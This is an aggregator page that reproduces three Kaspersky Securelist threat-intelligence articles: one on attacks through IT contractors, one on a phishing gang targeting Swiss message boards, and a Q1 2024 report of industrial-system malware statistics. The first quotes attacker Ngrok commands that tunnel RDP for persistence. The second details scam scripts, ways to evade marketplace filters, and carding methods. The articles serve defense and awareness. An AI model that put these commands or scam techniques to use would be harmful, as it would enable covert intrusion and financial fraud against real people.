Kaspersky Securelist

Syndikovat obsah Securelist
Aktualizace: 42 min 19 sek zpět

Trusted relationship attacks: trust, but verify

28 Květen, 2024 - 12:00

IT outsourcing market continues to demonstrate strong growth globally – such services are becoming increasingly popular. But along with the advantages, such as saved time and resources, delegating non-core tasks creates new challenges in terms of information security. By providing third-party companies (service providers or contractors) with access to their infrastructure, businesses increase the risk of trusted relationship attacks – T1199 in the MITRE ATT&CK classification.

In 2023, trusted relationship cyberattacks ranked among the top three most frequently used attack vectors. In such attacks, attackers first gain access to the service provider’s network, and then, if they manage to obtain active credentials for connecting to the target organization’s network, infiltrate the target infrastructure. In most cases, contractors are small- and medium-sized businesses that are less protected than large enterprises. This is also why IT service providers attract the attention of attackers.

Trusted relationship vector is attractive for attackers because it allows them to carry out large-scale attacks with significantly less effort than other vectors. Attackers only need to gain access to the service provider’s network to expose all its clients to cyberrisk, regardless of their size or industry. Moreover, attackers using legitimate connections often go unnoticed, as their actions within the affected organization’s infrastructure look like the actions of the service provider’s employees. According to 2023 statistics, only one in four affected organizations identified an incident as a result of detecting suspicious activity (launch of hacker tools, malware, network scanners, etc.) in their infrastructure, while the rest discovered they had been infiltrated via a third party only after data leakage or encryption.

How access is set up between the target organization and the service provider

Any way of connecting a contractor to the systems of a target organization – even the most secure way – is a potential point of entry for intruders. However, the customer company often gives the service provider quite a lot of access to its systems, including:

  • allocating various systems for conducting operations;
  • issuing accesses for connecting to the infrastructure;
  • creating domain accounts.

Most often, communication between the service provider and the client takes place via VPN connections and Remote Desktop Protocol (RDP) services. Access is set up using a certificate or a login/password pair, and in rare cases multi-factor authentication is added. Having compromised the service provider’s infrastructure, intruders can obtain user accounts or certificates issued by the target organization, and thereby connect to their systems.

Many companies resort to using remote management utilities such as AnyDesk or Ammyy Admin. Most of these utilities allow automatic access by login/password, but they are vulnerable to brute-force attacks. In addition, if misconfigured, these utilities allow connections from any IP addresses/systems if you have valid credentials.

Access to the internal infrastructure can also be organized using SSH or RDP protocols and an allowlist of IP addresses. With this method, there’s no need to connect to a VPN, but the security risks grow significantly (for example, the possibility of brute-force attacks).

At the same time, organizations find it difficult to monitor service providers’ compliance with security policies. For example, contractors may store credentials for connecting to the target organization’s network in plain text in public directories or in corporate information systems such as Jira or Confluence, which the client’s security service may not be aware of.

How attackers gain access to a service provider’s network

In our incident investigations, we continuously note the use of various initial attack vectors to gain access to the infrastructures of IT outsourcing companies. Let’s consider the three most popular ones, which make up more than 80% of all initial attack vectors.

The most common method of initial compromise is exploiting vulnerabilities in applications accessible from the internet. Thus, to penetrate the infrastructure, attackers most often used vulnerabilities in Microsoft Exchange, Atlassian Confluence, CMS Bitrix, and Citrix VDI.

The second most popular method is the use of compromised credentials. In every third incident where this vector was used, attackers bruteforced passwords for services accessible from the external network: RDP, SSH, and FTP. In other cases, they used data that was stolen before the incident began.

Rounding out the top three is targeted phishing. Attackers continue to refine their multi-step schemes and social engineering methods, often using attached documents and archives containing malware to penetrate the network.

Attack development

By investigating incidents related to trusted relationship attacks, we have identified the most interesting attacker tactics and techniques. We present them here in the order they appear in the attack process. In the incidents we worked on, attackers can be divided into two groups according to the tactics and techniques used: let’s call them Group A and Group B.

No. Event Description 1 Gaining access to service providers In most cases, the hack started by exploiting vulnerabilities in software accessible from the internet (Initial Access, Exploit Public-Facing Application, T1190). 2 Establishing persistence in the service provider’s infrastructure Attackers in Group A exclusively used the Ngrok tunneling utility at this stage. They installed it in the service provider’s infrastructure as a service. Only the Windows segment was compromised (Persistence, technique Create or Modify System Process: Windows Service, T1543.003). Attackers in Group B initially used backdoors for persistence, which were later used to load and launch Ngrok or the remote management utility AnyDesk. As a result, both Windows and Linux segments were compromised. The attackers used the following backdoors:

In some incidents, Ngrok persistence was achieved through the task scheduler. 3 Actions after compromising credentials for connecting to target organizations Group A, having discovered credentials for connecting to the service provider’s clients’ VPN tunnel, penetrated their infrastructure on the same day: the attackers connected to systems allocated to the contractor via the RDP protocol using accounts allocated for the contractor’s employees (Initial Access, Valid Accounts: Domain Accounts, T1078.002), established persistence using the Ngrok utility (probably in case of losing access to the VPN), and returned to the new victims’ infrastructure after several months. Up to three months could have passed between initial access to the target organization and attack discovery. Group B established persistence in the service provider’s infrastructure and returned after several months to carry out attacks on their clients. Up to three months could have passed between initial access to the contractor and attack discovery 4 Actions of attackers in the systems allocated to the service provider in the target organization The systems allocated to the service provider in the target organization became the entry point for the attackers. During incident investigations, traces of launch of numerous utilities were found on these systems:

5 Lateral movement in the target organization’s network For lateral movement within the target organization’s network, the attackers used the RDP protocol (Lateral Movement, Remote Services: Remote Desktop Protocol, T1021.001). 6 Data collection from workstations and servers of the target organization In some incidents, attackers from both groups collected data from workstations and servers (Collection, Data from Local System, T1005), packed them into archives (Collection, Archive Collected Data: Archive via Utility, T1560.001) and uploaded them to external file-sharing resources (Exfiltration, Exfiltration Over Web Service, T1567). 7 Fulfilling attack objectives In most cases, the attackers launched ransomware in the target organization’s infrastructure (Impact Data, Encrypted for Impact, T1486). It’s worth noting that group policies or remote creation of Windows services were often used to distribute ransomware files in the infrastructure. Less frequently, distribution and execution were carried out manually.

Attackers use tunneling utilities (Command and Control, Protocol Tunneling, T1572) or remote access software (Command and Control, Remote Access Software, T1219) for several reasons:

Firstly, this eliminates the need for a VPN, which is necessary to connect to the system in the target infrastructure via the RDP protocol, as contractor’s employees do. Attackers are often active during non-working hours, and correctly configured monitoring can alarm the security personnel upon detecting VPN connections at odd hours from suspicious IP addresses (for example, those belonging to public anonymization services). If such activity is detected, then the corresponding accounts will most likely be blocked, and, as a result, the attackers will lose access to the infrastructure.

With tunneling and remote access utilities, attackers can gain a secure foothold in the target system. AnyDesk allows you to register this software as a service. We’ve seen several options for establishing persistence through the Ngrok utility:

Launch type Commands As a service ngrok.exe service run –config ngrok.yml Manually ngrok.exe config add-authtoken <TOKEN>
ngrok.exe tcp 3389 As a task ngrok.exe tcp 3389 (authentication data was set manually before establishing persistence by executing the following command: ngrok.exe config add-authtoken <TOKEN>)

Secondly, the use of such utilities is convenient for attackers. The presence of a backdoor in the network provides them with unhindered access to the internal infrastructure; however, it’s not always comfortable to interact with the compromised system in this way, so attackers turn to utilities. By forwarding the RDP port through Ngrok or connecting via AnyDesk, the attacker is able to interact with the compromised system more easily.

Thirdly, such utilities are quite difficult to track. Ngrok and AnyDesk are legitimate utilities; they are not detected by antivirus tools as malware and are often used for legitimate purposes. In addition, they allow attackers to hide the IP address of the connection source in the compromised system.

For example, with a regular RDP connection, in the Microsoft-Windows-TerminalServices-LocalSessionManager/Operational.evtx log, we will see connection events (ID 21) or reconnection events (ID 25), where the attacker’s IP address will be indicated in the connection source field (external IP address if the system is accessible from the internet, or internal IP address of another compromised system). In the case of an RDP connection through a tunneling utility, the source connection value in the log will be ::%16777216 – it doesn’t carry any information about the connecting system. In most cases, this artifact will merely indicate a connection through a tunneling utility.

AnyDesk creates its own logs. Among them, the most useful for incident investigation are connection_trace.txt and ad.trace/ad_svc.trace, as they are named in Windows. The connection_trace.txt log allows you to quickly identify connections to the analyzed system and their type (User, Token, Password). If the attackers used AnyDesk and the log indicates a Token and Password connection type, it can be concluded that the attacker set up automatic connection by password and, with AnyDesk running, can reconnect to the system at any time. The ad.trace/ad_svc.trace log contains debugging information, which allows you to determine the IP address from which the connection was made. However, it’s worth noting that attackers often delete AnyDesk logs, making it nearly impossible to detect traces of their connections.

Fulfilling attack objectives

The ultimate goals of attacks on service providers and target organizations can vary. For example:

  • Establish persistence in the contractor’s infrastructure and remain undetected for as long as possible in order to gain access to their clients’ infrastructure.
  • Remain undetected for as long as possible in order to obtain confidential information (industrial espionage).
  • Exfiltrate as much data as possible and deploy ransomware or a wiper in the organization’s infrastructure to paralyze its activities. We observed this scenario in most attacks on target organizations.
Conclusion and advice

Practice shows that attackers, remaining undetected, usually stayed in the target organization’s infrastructure for up to three months and managed to gain control over critical servers and hosts in various network segments. Only after this did they proceed to encrypt the data. This is enough time for the information security department to detect the incident and respond to the attackers’ actions.

The results of our incident investigations indicate that in the overwhelming majority of cases, antivirus solutions detected malicious activity, but the antivirus verdicts were not paid due attention. Therefore, if you have an in-house incident response team, keep them alert through training and cyberexercises; if you don’t have one, subscribe to incident response services from a provider who can guarantee the necessary service level via appropriate SLA.

Attacks through trusted relationships are quite difficult to detect because:

  • Connections to the target organization’s VPN from the service provider’s network in the early stages are initiated from legitimate IP addresses.
  • Attackers use legitimate credentials to connect to systems within the target organization’s infrastructure (and otherwise).
  • Attackers increasingly use legitimate tools in their attacks.

Nevertheless, it is possible to detect these attacks by following certain rules. We’ve put together recommendations for service providers and their clients that will help detect trusted relationship attacks early on or avoid them altogether.

If you’re an IT service provider:

  • Ensure proper storage of credentials issued for connecting to your clients’ infrastructure.
  • Set up logging of connections from your infrastructure to the clients’ one.
  • Promptly install software updates or use additional protection measures for services at the network perimeter.
  • Implement a robust password policy and multi-factor authentication.
  • Monitor the use of legitimate tools that could be exploited by attackers.

If your organization uses the services of IT outsourcing companies:

  • When allowing service providers into your infrastructure, give them time-limited access to necessary hosts only.
  • Monitor VPN connections: which account was authorized, at what time, and from which IP address.
  • Implement a robust password policy and multi-factor authentication for VPN connections.
  • Limit the privileges of accounts issued to service providers, applying the principle of least privilege.
  • Apply the same information security requirements to third parties connecting to the internal infrastructure as to hosts in the internal network.
  • Identify situations where chains of different accounts are used to access systems within the infrastructure. For example, if service provider’s employees connect to the VPN using one account and then authenticate via RDP using another account.
  • Monitor the use of remote access and tunneling utilities or other legitimate tools that could be used by attackers.
  • Ensure the detection of the following events within the network perimeter: port scanning, bruteforcing domain account passwords, bruteforcing domain and local account names.
  • Pay special attention to activity within your infrastructure outside of working hours.
  • Back up your data and ensure that your backups are protected as strictly as your primary assets.
Key MITRE ATT&CK tactics and techniques used in trusted relationship attacks Tactic Technique Technique ID Initial Access Exploit Public-Facing Application T1190 Initial Access Trusted Relationship T1199 Initial Access Valid Accounts: Domain Accounts T1078.002 Persistence Create or Modify System Process: Windows Service T1543.003 Persistence Hijack Execution Flow: Dynamic Linker Hijacking T1574.006 Persistence Scheduled Task/Job: Scheduled Task T1053.005 Credential Access OS Credential Dumping T1003 Discovery Network Service Discovery T1046 Discovery Account Discovery: Domain Account T1087.002 Discovery Remote System Discovery T1018 Lateral Movement Remote Services: Remote Desktop Protocol T1021.001 Collection Data from Local System T1005 Collection Archive Collected Data: Archive via Utility T1560.001 Command and Control Protocol Tunneling T1572 Command and Control Remote Access Software T1219 Exfiltration Exfiltration Over Web Service T1567 Impact Data Encrypted for Impact T1486

Message board scams

27 Květen, 2024 - 15:00

Marketplace fraud is nothing new. Cybercriminals swindle money out of buyers and sellers alike. Lately, we’ve seen a proliferation of cybergangs operating under the Fraud-as-a-Service model and specializing in tricking users of online marketplaces, in particular, message boards. Criminals are forever inventing new schemes for stealing personal data and funds, which are then quickly distributed to other scammers through automation and the sale of phishing tools. This article explores how these cybergangs operate, how they find and fool victims, with a special look at a campaign targeting users of several European message boards.

Ways to deceive message board users

There are two main types of message board scams.

  1. The first one is when a scammer impersonates the seller and offers to ship an item to the buyer. When the buyer inquires about the terms of delivery and method of payment, the scammer (in the role of the seller) asks for the buyer’s full name, address and phone number, and for online payment. If the victim agrees, they are sent a phishing link to pay for the order (in a third-party messenger or in a dialog box on the message board itself, if the site does not block such links). As soon as the user enters their card details on the fake site, they go straight to the fraudster, who debits the available balance.
    This type of fraud is known as scam 1.0 or a buyer scam, because the attacker poses as the seller to deceive the buyer. It is considered outdated as most message board users are aware of it. Besides, the method involves waiting around for a buyer to take an interest in the item on offer.
  2. Alternatively, the scammer can pose as the buyer and deceive the seller by persuading the seller to dispatch the item and collect payment by “secure transaction”. As in scam 1.0, the attackers send a phishing link to the duped seller via a third-party messenger or directly on the message board. The linked page requests payment card details. If the seller enters these, supposedly to receive payment, the attacker debits all the money from the card.
    This is known as scam 2.0 or a seller scam, because the attacker deceives the seller posing as the buyer. This type of scam is more common than the first, since fewer users are familiar with it, so the chances of finding a victim are greater. What’s more, in scam 2.0 the attacker proactively searches for victims, instead of waiting for one to appear, which speeds up the operation.

In both cases, clicking the link opens a phishing site – a near exact replica of a real trading platform or payment service with just one tiny difference: all the data you enter there will fall into cybercriminal hands. Now for a closer look at the scam 2.0 scheme targeting sellers.

How attackers choose their victims

Scammers have several criteria for selecting potential victims. Primarily they are drawn to ads that sellers have paid to promote. Such ads usually appear at the top of search results and are marked as sponsored. They attract scammers for two reasons: first, a seller who pays for promotion is more likely to have money, and second, they are probably looking for a quickish sale.

Besides the sponsored label, attackers look at the photos in the ad: if they are of professional quality, it is most likely an offer from a store. Scammers are not interested in such ads.

Lastly, attackers need sellers who use a third-party messenger and are willing to provide a phone number. This information becomes known only after contact is made.

How the victim is deceived

The main goal is to persuade the victim to click a phishing link and enter their card details. Like any buyer, the scammer opens the conversation with a greeting and an inquiry about whether the offer is still on the table. After that, the threat actor asks the seller various questions about the product, such as its condition, how long ago they purchased it, why they want to sell it, and so on. Experienced scammers ask no more than three questions to avoid arousing suspicion.

Next, the attacker agrees to buy the item, but says they cannot pick it up in person and pay in cash because, say, they are out of town (here the scammer can get creative), and then asks if delivery with “secure payment” is acceptable.

To deflect potential questions from the seller, the scammer explains the payment scheme in detail, roughly as follows:

  1. I pay for the item on [name of site].
  2. You get a link to receive the money.
  3. You follow the link and enter your card details to receive the payment.
  4. Once you receive the money, the delivery service will contact you to establish your preferred shipping method. Shipping will already be paid for. The delivery service will pack and document the item for you.

If the victim starts to quibble about the payment method, the scammer simply vanishes so as not to waste time. If the seller wants to continue negotiations on the marketplace’s official website, the attacker concludes they smell a rat and will be unlikely to click the phishing link, and so stops replying and begins the search for a new victim.

If, however, the victim clicks the link and enters their card details, the scammers siphon off all available funds. The price of the item is irrelevant: even if the amount asked for in the ad was insignificant, the attackers will steal whatever they can.

What phishing pages look like

In the scam 2.0 scheme, there are two main flavors of phishing site: some mimic the marketplace with the victim’s ad, others a secure payment service such as Twin. Below is an example of a phishing ad and the original on the official site.

Phishing ad

Original ad

As we see, the scammers have produced a near exact copy of the marketplace interface. The fake page differs from the original only in minor details. In particular, instead of the Inserent kontaktieren (“Contact advertiser”) button, the phishing page shows a Receive 150 CHF button. Clicking this button opens a page with a form for entering card details.

Phishing payment pages

If the original link opens a copy of a secure payment service, the card data entry form appears directly on this page, without additional redirections.


Recently, whole groups of scammers specializing in message boards have gained widespread notoriety. Practicing both types of fraud (scam 1.0 and scam 2.0), they unite criminal masterminds, support teams, and low-level players.

We carried out an in-depth study of one such gang targeting message board users in Switzerland. Drawing on this example, we will show the internal structure and organization of activities in such structures.

A cybercriminal group may include the following roles:

  • Topic starter (TS) is the team’s founder and main administrator.
  • Coder is responsible for all technical components: Telegram channels, chats, bots, etc.
  • Refunder is a scammer who handles tech support chats on phishing sites. They help coax the victim into entering their card details, which is the attackers’ ultimate goal. The name “refunder” comes from the fact that the victim is directed to such a “specialist” if they are unhappy about the debit and want a refund.
  • Carder has the task of withdrawing money from the victim’s bank account. As a rule, having received card data, the carder uses it to pay for various goods, services, loans, etc. The process of paying for purchases with someone else’s card is called carding.
  • Motivator provides moral support to scammers. Their task is to make sure the gang remains focused and doesn’t lose heart. The motivator offers podcasts and support in personal messages – a chance to discuss any problems, including personal issues unrelated to fraud. Only large operations have the funds to engage such an “employee”. The motivator works for a percentage of the stolen money.
  • Marketer is responsible for ad campaigns and the design and appearance of bots and accompanying materials – mainly on dark web platforms and Telegram channels for scammers. Advertising is needed to attract new workers.
  • Worker is a scammer who directly deceives victims: finds ads, responds to them, persuades the victim to follow a phishing link, etc. Workers differ from regular scammers only in that they work for a group and make use of its tools and support. As payment, workers receive the funds they steal, minus a commission. The process of defrauding victims is called work.
  • Mentor is an experienced worker assigned to a newcomer.
  • Consummator is a woman who encourages a man to buy gifts and scams money out of him. This role is offered to all women who join closed groups where scammers communicate with each other.

Other scammer terms worth highlighting are:

  • A trusting user who has already been deceived is called a mammoth.
  • The amount of money on the card whose details the victim entered on a phishing website is called logs.
  • The amount debited from the victim’s card is called profit.

Groups communicate in closed groups and channels on Telegram, where they search for new workers, support bots for creating phishing links, track clicks on sent links, as well as keep statistics on each case and the profits of individual workers and the group as a whole.


Cybergangs operate under the Fraud-as-a-Service model, in which the main service consumers are workers. Organizers provide functioning services (channels/chats/bots on Telegram, phishing sites, payment processing, laundering/debiting of funds), as well as moral support and “work” manuals. In return, they take a commission from each payment.

Which countries are targeted by message board scams?

Scam 1.0 and scam 2.0 appeared several years ago, and both schemes can still be found on Russian-language message boards. But scams aimed at the Russian segment are considered old-hat among experienced scammers, since Russian users are tuned in to such schemes and there is a high risk that the attackers will be found and arrested. Therefore, scammers are switching to other countries.

The group at the center of our investigation is primarily focused on Switzerland. In their chat, the scammers cite the reason as the lower risk of getting caught and Swiss-based users’ relative unfamiliarity with this type of scam. In addition, before placing ads or responding to them, the scammers get to know the target country’s market and basic facts about it. For example, what languages and dialects are spoken there. This is to address the victim in their local tongue so as to win trust more easily. According to 2023 data, over two-thirds of the Swiss population aged 15 and older are fluent in at least two languages.

The gang under study also operates in Canada, Austria, France, and Norway.

Work manual

We analyzed the instructions that the group gives to new workers and found out how they get started. First of all, on the dark web, the worker buys accounts on message boards, which they will then scour for victims. Attackers buy accounts rather than create them, since registering on sites carries more risks. That done, the worker creates an account in a third-party messenger. This account is used for communication with the victim. Some users themselves ask for a number to make contact via messenger; in other cases, it is the worker who offers it to reduce the risk of getting banned on the marketplace. Virtual phone numbers are used for registration.

The next step is for the worker to find a proxy server that will provide anonymity and confidentiality. When connecting through this, the marketplace sees the server’s IP address and other information, which allows the attacker to hide their identity data. A proxy is generally considered good if the account is not banned immediately after registration. If a worker uses a VPN, for instance, their accounts will get banned very quickly: connecting via VPN entails a frequent change of IP address and geolocation, which is why sites often identify such accounts as bots.

Besides instructions for getting started, the manual contains templates shared by experienced gang members. The novice worker can use the templates to persuade a victim to make a deal or assuage any concerns about the proposed payment method.

The manual also contains instructions on how to bypass restrictions imposed by sites. Message boards are constantly updated to strengthen internal security, so it’s increasingly difficult for workers to use stock phrases in communicating with users. For example, in November 2023, one popular marketplace banned payments through Tripartie, a commonly used platform for secure transactions in Switzerland, and began blocking accounts for mentioning this system in chats. To get around this update, workers deliberately misspell the name Tripartie. More experienced workers use the Cyrillic alphabet to make the name of the payment system unreadable to the site’s security systems.

Monetizing stolen cards

If the seller enters their card details, the worker sends the data to the carder, who withdraws money from the card within the established limits. There are different ways to do this: by purchasing expensive devices, transferring money to an e-wallet such as PayPal, etc. The carder may also try to have a credit or loan issued in the card owner’s name, or open a deposit. To do this, they use online banks that do not require SMS verification. Some institutions may ask for a passport scan, in which case the carder uses passport data that was stolen or taken from people with no fixed abode. Although this data has nothing to do with the card owner, scammers rely on the fact that online banks do not always check that the passport and card belong to the same person.

Fraud automation with Telegram bots

To simplify the job of workers, the group deploys a phishing Telegram bot. This automates the process of creating phishing pages and communicating with victims, as well as tracking the scammers’ progress. The bot’s main page has buttons for creating a phishing link, viewing a personal profile, quick access to the group’s chats and channels, plus settings.

Home page of the bot

Clicking the button to create a phishing page lets the user select a country for which a unique link will be generated.

Button for selecting a region

Next, the worker specifies the name of the item that the victim wants to buy (if the victim is a buyer) or sell (if a seller).

Specifying item name

With this data the bot is able to create a full copy of the original ad, but on the phishing page. In addition, the worker feeds information from the ad (photo, price, description, etc.) into the bot, so that the victim feels like they are on the original page.

After filling in all the data, the bot provides phishing links in all languages for the target country, for all available message boards, and for both scam types (buyer and seller), from which the worker chooses the most suitable.

Selecting the link

Here the scammer can message the victim by email, messenger or text. The contact information is obtained from the target’s profile on the site, or is wheedled out in a private chat.

Selecting actions to perform with the ad

After a successful phishing attack, the worker can view their in-bot profile, which displays personal information: ID, handle, card balance, amount earned by the worker personally and by the group as a whole.

Personal profile data

Also inside the bot, it is possible to make direct contact with a mentor and to earn additional revenue through the “refer-a-friend” scheme.

In-bot tools

What the phishing links look like

The phishing links that the group creates with its Telegram bot are built along the same pattern:

  • domain/language/action/ad number

The domain most often contains the full or partial name of the message board that the phishing page imitates, but this is not a mandatory component.

Language information may vary, as it depends on the target country. In case of Switzerland, there are the following options: en, it, fr, de.

The action is what the victim purportedly needs to do: pay for the item or receive payment. This element takes one of two values: pay (if the scammer is posing as a seller) or receive (if as a buyer).

The phishing link always ends in the ad number, identical to the original.

Examples of phishing links

Bot updates

Cybergangs are constantly tweaking and updating their Telegram bots. They add new information useful for workers and expand the arsenal of scam automation tools.

During our observation of the Telegram bot under study, information appeared about the group’s income for different periods: per day and for its entire existence, as well as information about the worker’s income per week and per month.

User profile information

The next update added detailed information about mentors and their workload. In total, the group has five mentors, who oversee more than 300 workers. At the time of posting, the scammers’ group on Telegram had more than 10,000 members.

The most experienced workers with profits in excess of 20,000 euros can become mentors. This involves submitting an application to the head mentor for consideration. Mentors receive a percentage of their mentees’ earnings. The size of the commission is set by mentors themselves, and goes up with experience.

Mentoring system

Besides the modified interface, the way in which links are created was updated, with an expanded list of platforms targeted by phishing.

Platforms for phishing

What happens after clicking a link

The link from the bot points to a phishing site, the address of which may differ from the original by just one letter. The page is a full copy of the original ad, including the site logo and name, price and description of the item of interest.

Phishing ad aimed at deceiving the buyer. For the seller, the page is the same, only instead of a Pay button there will be a Receive button.

When the victim clicks the phishing link, the worker receives a notification in the bot about this activity. The notification prompts the scammer to check if the victim is online (that is, whether they’ve opened the phishing link) and, if necessary, to start a chat. Such notifications are created to simplify the worker’s tasks and speed up the response.

Notification about a phishing link click

When the victim enters card details, the carder immediately uses them, and a notification is sent to the group’s general chat about receipt of a new payment. The message specifies the stolen amount, plus information about how much of it will go to the carder and the worker. The worker’s share is automatically credited to their account specified in the bot settings. The message from the bot also contains the name of the user who pays the worker their profit. This is so that scammers themselves do not get cheated, as there have been cases of workers, under the guise of payment, swindling money out of “colleagues” or asking to borrow a certain sum and not returning it.

Notification of payment

Late in the day, a notification is sent to the general chat about the amount earned by the entire group for the day, month and whole period of operation. The group in question was established in August 2023. It made its first profit 3 days and 17 hours later. Back then, it had 2,675 workers and receipts worth 1,458 USD.

Amount of group payments for February 2024

Profit and statistics

We compiled statistics on the group’s activities for the period February 1–4, 2024, inclusive.

Country Total logs Total profits Canada 1,084.999 CAD 0 CAD Switzerland 50,431.17 CHF 10,273 CHF France 850 EUR 0 EUR Austria 2,900 EUR 0 EUR

In four days, the group earned 10,273 CHF (roughly 11,500 USD). At the same time, from the log amounts, we see the attackers could have stolen over 50,000 USD from Swiss cards alone. Why didn’t they? The main reason is that the carder does not work with logs worth less than 300 CHF (330 USD). This is most likely because total profits received from such logs will be less than the cost of debiting them. Moreover, withdrawing money from a card carries a high risk of detection, so carders are only interested in cards holding large sums of money. Lastly, some victims may have managed to block their cards before they fell into the carder’s hands, or entered incorrect data, which would have impacted the total amount of logs.

Carder limit

Country Number of logs Switzerland 65 France 6 Austria 4 Canada 4

Looking at the number of logs received, we see the most popular country is Switzerland. France comes second. In joint third place are Austria and Canada.

Platforms Number of logs Total profits Facebook 26 0 CHF Post.ch 16 3,887 CHF Tutti.ch 16 2,434 CHF Anibis.ch 11 3,952 CHF

In terms of message boards whose users were scammed, the most popular platforms among attackers were: Facebook, Post.ch and Tutti.ch. That said, logs from Facebook earned no profits for scammers. The most profitable platform was Anibis.ch, which lies in fourth place by number of logs; Post.ch is in second place, and Tutti.ch in third.

How not to swallow workers’ bait

Although message board scams are automated and production-lined, you can take protective measures.

  • Trust only official sites. Before entering card details in any form, study the site address, make sure there are no typos or extra characters in the domain, and check when it was created: if the site is just a couple of months old, it is likely to be fraudulent. Safest of all is not to follow links to enter your data, but to type in the URL in the address bar manually or open it from bookmarks.
  • When buying or selling goods on message boards, do not switch to third-party messengers. Conduct all correspondence in a chat on the platform. Such platforms typically use fraud protection and forbid sending suspicious links.
  • Where possible, refuse payment in advance – pay only when you receive the item in good condition.
  • Do not scan QR codes sent from untrusted sources.
  • Do not sell goods “with delivery” if the platform has no such option. If the buyer is located in another city, choose a delivery service yourself, giving preference to large, reputable companies.

Threat landscape for industrial automation systems, Q1 2024

27 Květen, 2024 - 12:00

Global statistics Statistics across all threats

In the first quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.3 pp from the previous quarter to 24.4%.

Compared to the first quarter of 2023, the percentage decreased by 1.3 pp.

Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022–2024

Selected industries

Building automation has historically led the surveyed industries in terms of the percentage of ICS computers on which malicious objects were blocked.

Percentage of ICS computers on which malicious objects were blocked in selected industries

In the first quarter of 2024, the percentage of ICS machines that blocked malicious objects decreased across all industries.

Diversity of detected malware

In the first quarter of 2024, Kaspersky’s protection solutions blocked malware from 10,865 different families belonging to various categories on industrial automation systems.

Percentage of ICS computers on which the activity of malicious objects in various categories was prevented

Compared to the previous quarter, in the first quarter of 2024, the most significant increase in the percentage of ICS computers on which malicious objects in various categories were blocked was detected for AutoCAD malware: by 1.16 times.

Main threat sources

The internet, email clients, and removable storage devices remain the primary sources of threats to computers in an organization’s operating technology infrastructure. Note that the sources of blocked threats cannot be reliably identified in all cases.

In the first quarter of 2024, the percentage of ICS computers on which threats from various sources were blocked decreased for every major source.

Percentage of ICS computers on which malicious objects from various sources were blocked


Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 32.4% in Africa to 11.5% in Northern Europe.

Regions ranked by percentage of ICS computers where malicious objects were blocked, Q1 2024

The two regions with the highest percentage of attacked ICS computers, Africa and South-East Asia, saw their percentages increase from the previous quarter.

Malicious activity in numbers Malicious objects used for initial infection

Malicious objects that are used for initial infection of computers include dangerous internet resources that are added to denylists, malicious scripts and phishing pages, and malicious documents.

By cybercriminals’ logic, these malicious objects can spread easily. As a result, they are blocked by security solutions more often than everything else. This is also reflected in our statistics.

Globally and in almost all regions, denylisted internet resources and malicious scripts and phishing pages occupy first place in the rankings of malware categories by percentage of ICS computers on which this malware is blocked.

The sources of most malicious objects used for initial infection are the internet and email. The leading regions by percentage of ICS computers on which threats from these sources were blocked are the following:

Internet threats

  • Africa – 14.82%;
  • South-East Asia – 14.01%.

Email threats

  • Southern Europe – 6.85%;
  • Latin America – 5.09%.
Denylisted internet resources

The leading regions by percentage of ICS computers on which denylisted internet resources were blocked were:

  • Africa – 8.78%;
  • Russia – 7.49%;
  • South Asia – 7.48%.
Malicious scripts and phishing pages

The leading regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were:

  • Latin America – 7.23%;
  • Southern Europe – 6.96%;
  • Middle East – 6.95%.
Malicious documents

The leading regions by percentage of ICS computers on which malicious documents were blocked were:

  • Southern Europe – 3.24%;
  • Latin America – 2.94%;
  • Eastern Europe – 2.33%.
Next-stage malware

Malicious objects used for initial infection of computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers.

Among the miners designed to run on Windows, some of the most common are those distributed by attackers in the form of NSIS installer files with legitimate software.


As a rule, the higher the percentage of ICS computers on which initial infection malware is blocked, the higher the percentage of next-stage malware.

The three leading regions by percentage of ICS computers on which spyware was blocked were as follows:

  • Africa – 6.65%;
  • Middle East – 5.89%;
  • Southern Europe – 5.45%.

Spyware ranks no higher than third place in the threat category rankings by percentage of ICS computers on which it was blocked in almost every region except for:

  • East Asia: in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked, at 3.68%.
  • Central Asia: in this region, in the relevant rankings, spyware sits at second place with 4.40%.
Covert crypto mining programs Miners in the form of executable files for Windows

The leading regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked were:

  • Central Asia – 1.78%;
  • Russia – 1.38%;
  • Eastern Europe – 1.06%.

Miners in the form of Windows executable files are seventh in the global rankings of threat categories by percentage of ICS computers on which they were blocked.

  • They are fourth in the relevant rankings for Russia.
  • They are in fifth place in Central Asia.

We should note that during Q1 2024, the percentage of ICS computers on which miners in the form of Windows executable files were blocked increased in all regions except for Russia and Central Asia.

Web miners running in browsers

The leading regions by percentage of ICS computers on which browser-based web miners were blocked were:

  • Africa – 0.91%;
  • Middle East – 0.84%;
  • Australia and New Zealand – 0.78%.

In the regional rankings of threat categories by percentage of ICS computers on which they were blocked, web miners ended up in fifth place in the following regions:

  • Australia and New Zealand – 0.78%;
  • US and Canada – 0.45%;
  • Northern Europe – 0.27%.

Globally, this threat ranked eighth.

In Q1 2024, the percentage of ICS computers on which browser-based web miners were blocked increased in all regions except for Russia and Central Asia.


The regions with the highest percentage of ICS computers on which ransomware was blocked were:

  • Middle East – 0.28%;
  • Africa – 0.27%;
  • South Asia – 0.22%.
Self-propagating malware. Worms and viruses

Worms and virus-infected files were originally used for initial infection, but as botnet functionality evolved, they took on next-stage characteristics.

To spread across ICS networks, viruses and worms rely on removable media, network folders, infected files including backups, and network attacks on outdated software.

In three regions, the percentage of ICS computers on which threats were blocked when connecting removable media is higher than the percentage of ICS computers on which mail threats were blocked – although it was lower in all others:

  • Africa – 5.6% (leads this ranking);
  • South Asia – 2.46%;
  • Central Asia – 1.51%.

The leading regions by percentage of ICS computers on which worms were blocked were:

  • Africa – 5.29%;
  • Central Asia – 2.88%;
  • Middle East – 2.40%.

Globally, worms are in sixth place in the threat category ranking by percentage of ICS computers on which they were blocked. In similar regional rankings, worms are in fourth place in four regions:

  • Africa – 5.29%;
  • Central Asia – 2.88%;
  • Middle East – 2.40%;
  • South Asia – 1.95%.

Two of these regions led by percentage of ICS computers on which threats were blocked when connecting removable media:

  • Africa – 5.60%;
  • South Asia – 2.46%.

The leading regions by percentage of ICS computers on which viruses were blocked were:

  • Southeast Asia – 7.61%;
  • Africa – 4.09%;
  • East Asia – 2.89%.

In Southeast Asia, viruses are in first place (!) in the threat category rankings by percentage of ICS computers on which they were blocked.

